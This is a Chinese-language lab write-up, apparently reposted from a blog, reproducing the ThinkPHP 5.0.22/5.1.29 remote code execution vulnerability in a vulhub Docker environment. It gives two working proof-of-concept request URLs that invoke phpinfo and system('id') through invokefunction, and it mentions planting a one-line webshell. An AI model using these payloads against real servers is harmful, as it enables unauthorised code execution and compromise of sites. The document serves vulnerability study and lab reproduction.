Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
短信预约 -IT技能 免费直播动态提醒
Thinkphp RCE
0x00 漏洞原理
ThinkPHP是国内使用极为广泛的PHP开发框架。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。
0x01 影响版本
Thinkphp =5.0.22 / 5.1.29
0x02 环境搭建
cd vulhub-master/thinkphp/5-rce #进入vulhub靶场docker-compose up -d
0x03 漏洞复现
访问http://your-ip:8080,可以看到ThinkPHP的默认页面
POC1
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
访问该POC1可以看到执行了phpinfo
POC2
http://192.168.68.168:8080//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
访问POC2可以看到执行了id
用工具探测,成功探测到该漏洞
写入一句话木马
成功连上执行命令
参考链接
https://vulhub.org/
https://www.freebuf.com/articles/web/274062.html
来源地址:https://blog.csdn.net/qq_44842234/article/details/125835173
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341